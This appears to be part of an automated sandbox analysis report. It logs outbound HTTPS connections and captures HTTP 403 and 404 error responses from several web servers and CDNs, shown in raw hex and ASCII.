                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63118
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53549 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64244 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63111
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63110
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63113
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63112
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64173 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63115
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63114
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63117
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61531 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54491 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 63340 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58361 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57527 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58373 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57515 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64185 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61518 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56527 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64293 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57481 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53491 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 63339 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51189
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51187
                      Source: unknownNetwork traffic detected: HTTP traffic on port 63293 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51191
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51195
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51193
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58385 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:51 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:51:51 GMTContent-Type: text/htmlContent-Length: 75193Connection: closeVary: Accept-EncodingETag: "6459edff-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:51 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:51:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:58 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:51:59 GMTContent-Type: text/htmlContent-Length: 75193Connection: closeVary: Accept-EncodingETag: "6459edff-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:51:59 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:00 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:52:03 GMTContent-Type: text/htmlContent-Length: 75193Connection: closeVary: Accept-EncodingETag: "6459edff-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:03 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:03 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:52:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:49:56 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMepe296fMW5KF9VDXVotyUV,qquldgcFrj2n046g4RNSVE8eNr0PeAeqFyO7fo2b794=X-Wix-Request-Id: 1685537396.792367640042316733X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:49:56 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D3zhYG1Y36sZxBYO1lDmOl5bD3FbTqniblLagExH5LpccjEo7x4MenlyVK8uCilrthW2vdoYtgiLqBy1Hz2ugP7JOdGBR0lmBpvRNW0RNxYPCQ8OP2D6vlciQi2XE7w%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff56fa0c2d3654-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:49:56 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oTwp53GTpNCgdtoGHoVzFH1AxmjLS6Yb1G48PCgsHFgDHaF2WuoCLekgK52%2F%2Benjbacqc6IAijY5nAk7tcfEmVe3xjgKjugkmbkXhVFQkwSSw%2BiCb4Ez525Xry5cIR6D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff56fa8d0a3654-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:49:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 31 May 2023 12:50:12 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6yvDtTLbZgOVjrMT49UemE3x9jAmzQyeZFG%2FnT%2FfMWoIwreVq61mU319vjkgZd%2FN9EIv5TnAQufKiqua3d5%2BwegFuJwwo7IoQoh0xKbi4a7N1zZxvEq2P6QYpFozMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 7cff56fb6ea73642-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 61 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 Data Ascii: 11a0<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compa
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:49:57 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 31 May 2023 12:49:57 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:49:57 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd/151owQ/lnPQAbZp+OUtp,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1685537397.65116131490915762X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:49:58 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
